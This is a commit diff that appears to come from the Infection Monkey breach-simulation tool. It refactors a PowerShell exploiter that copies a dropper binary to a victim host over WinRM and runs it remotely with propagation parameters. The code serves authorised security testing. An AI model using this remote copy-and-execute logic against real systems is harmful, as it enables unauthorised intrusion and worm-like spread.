Agent: Extract method _build_monkey_execution_command

2021-08-24 12:16:52 -04:00 · 2021-08-24 12:16:52 -04:00 · aef8f2e37a
parent 1928f1b9bc
commit aef8f2e37a
1 changed files with 21 additions and 18 deletions
--- a/monkey/infection_monkey/exploit/powershell.py
+++ b/monkey/infection_monkey/exploit/powershell.py
@ -121,15 +121,15 @@ class PowerShellExploiter(HostExploiter):

        self._write_virtual_file_to_local_path()

-        self.monkey_path_on_victim = (
+        monkey_path_on_victim = (
            self._config.dropper_target_path_win_32
            if self.is_32bit
            else self._config.dropper_target_path_win_64
        )
-        is_monkey_copy_successful = self._copy_monkey_binary_to_victim()
+        is_monkey_copy_successful = self._copy_monkey_binary_to_victim(monkey_path_on_victim)

        if is_monkey_copy_successful:
-            self._run_monkey_executable_on_victim()
+            self._run_monkey_executable_on_victim(monkey_path_on_victim)
        else:
            return False

@ -153,28 +153,17 @@ class PowerShellExploiter(HostExploiter):
            with open(TEMP_MONKEY_BINARY_FILEPATH, "wb") as monkey_local_file:
                monkey_local_file.write(monkey_virtual_file.read())

-    def _copy_monkey_binary_to_victim(self) -> bool:
+    def _copy_monkey_binary_to_victim(self, dest: str) -> bool:
        try:
-            self.client.copy(TEMP_MONKEY_BINARY_FILEPATH, self.monkey_path_on_victim)
+            self.client.copy(TEMP_MONKEY_BINARY_FILEPATH, dest)
            return True
        except Exception:
            return False
        finally:
            os.remove(TEMP_MONKEY_BINARY_FILEPATH)

-    def _run_monkey_executable_on_victim(self) -> None:
-        monkey_params = build_monkey_commandline(
-            target_host=self.host,
-            depth=get_monkey_depth() - 1,
-            vulnerable_port=None,
-            location=self.monkey_path_on_victim,
-        )
-
-        monkey_execution_command = RUN_MONKEY % {
-            "monkey_path": self.monkey_path_on_victim,
-            "monkey_type": DROPPER_ARG,
-            "parameters": monkey_params,
-        }
+    def _run_monkey_executable_on_victim(self, executable_path) -> None:
+        monkey_execution_command = self._build_monkey_execution_command(executable_path)

        with self.client.wsman, RunspacePool(self.client.wsman) as pool:
            ps = PowerShell(pool)
@ -182,3 +171,17 @@ class PowerShellExploiter(HostExploiter):
                "name", "create"
            ).add_parameter("ArgumentList", monkey_execution_command)
            ps.invoke()
+
+    def _build_monkey_execution_command(self, executable_path) -> str:
+        monkey_params = build_monkey_commandline(
+            target_host=self.host,
+            depth=get_monkey_depth() - 1,
+            vulnerable_port=None,
+            location=executable_path,
+        )
+
+        return RUN_MONKEY % {
+            "monkey_path": executable_path,
+            "monkey_type": DROPPER_ARG,
+            "parameters": monkey_params,
+        }